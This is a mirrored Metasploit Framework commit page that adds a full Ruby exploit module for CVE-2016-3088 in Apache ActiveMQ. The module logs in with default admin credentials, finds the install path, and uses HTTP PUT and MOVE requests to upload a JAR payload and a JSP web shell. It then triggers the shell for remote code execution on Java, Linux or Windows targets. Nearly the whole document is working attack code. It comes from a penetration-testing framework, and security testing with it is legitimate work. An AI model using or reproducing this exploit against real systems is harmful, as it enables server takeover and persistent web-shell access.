mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-05 14:57:30 +01:00
Land #8519, Apache ActiveMQ file upload exploit
This commit is contained in:
commit
43d8c4c5e7
140
modules/exploits/multi/http/apache_activemq_upload_jsp.rb
Normal file
140
modules/exploits/multi/http/apache_activemq_upload_jsp.rb
Normal file
@ -0,0 +1,140 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ActiveMQ web shell upload',
|
||||
'Description' => %q(
|
||||
The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0
|
||||
allows remote attackers to upload and execute arbitrary files via an
|
||||
HTTP PUT followed by an HTTP MOVE request.
|
||||
),
|
||||
'Author' => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2016-3088' ],
|
||||
[ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => %w{ java linux win },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Java Universal',
|
||||
{
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA
|
||||
}
|
||||
],
|
||||
[ 'Linux',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
],
|
||||
[ 'Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => "Jun 01 2016",
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),
|
||||
OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),
|
||||
OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),
|
||||
OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),
|
||||
Opt::RPORT(8161)
|
||||
])
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])
|
||||
])
|
||||
end
|
||||
|
||||
def jsp_text(payload_name)
|
||||
%{
|
||||
<%@ page import="java.io.*"
|
||||
%><%@ page import="java.net.*"
|
||||
%><%
|
||||
URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("./#{payload_name}.jar")).toURI().toURL()});
|
||||
Class c = cl.loadClass("metasploit.Payload");
|
||||
c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
|
||||
%>}
|
||||
end
|
||||
|
||||
def exploit
|
||||
jar_payload = payload.encoded_jar.pack
|
||||
payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))
|
||||
host = "#{datastore['RHOST']}:#{datastore['RPORT']}"
|
||||
@url = datastore['SSL'] ? "https://#{host}" : "http://#{host}"
|
||||
paths = get_upload_paths
|
||||
paths.each do |path|
|
||||
if try_upload(path, jar_payload, payload_name)
|
||||
break handler if trigger_payload(payload_name)
|
||||
print_error('Unable to trigger payload')
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def try_upload(path, jar_payload, payload_name)
|
||||
['.jar', '.jsp'].each do |ext|
|
||||
file_name = payload_name + ext
|
||||
data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
|
||||
move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
|
||||
upload_uri = normalize_uri('fileserver', file_name)
|
||||
print_status("Uploading #{move_headers['Destination']}")
|
||||
register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')
|
||||
return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
|
||||
send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
|
||||
@trigger_resource = /webapps(.*)/.match(path)[1]
|
||||
end
|
||||
true
|
||||
end
|
||||
|
||||
def get_upload_paths
|
||||
base_path = "#{get_install_path}/webapps"
|
||||
custom_path = datastore['UploadPath']
|
||||
return [normalize_uri(base_path, custom_path)] unless custom_path.nil?
|
||||
[ "#{base_path}/api/", "#{base_path}/admin/" ]
|
||||
end
|
||||
|
||||
def get_install_path
|
||||
properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body
|
||||
match = properties_page.tr("\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/)
|
||||
return match[1] unless match.nil?
|
||||
end
|
||||
|
||||
def send_request(method, uri, expected_response = 200, opts = {})
|
||||
opts['headers'] ||= {}
|
||||
opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])
|
||||
opts['headers']['Connection'] = 'close'
|
||||
r = send_request_cgi(
|
||||
{
|
||||
'method' => method,
|
||||
'uri' => uri
|
||||
}.merge(opts)
|
||||
)
|
||||
return false if r.nil? || expected_response != r.code.to_i
|
||||
r
|
||||
end
|
||||
|
||||
def trigger_payload(payload_name)
|
||||
send_request('POST', @url + @trigger_resource + payload_name + '.jsp')
|
||||
end
|
||||
|
||||
def error_out
|
||||
print_error('Upload failed')
|
||||
@trigger_resource = nil
|
||||
false
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue
Block a user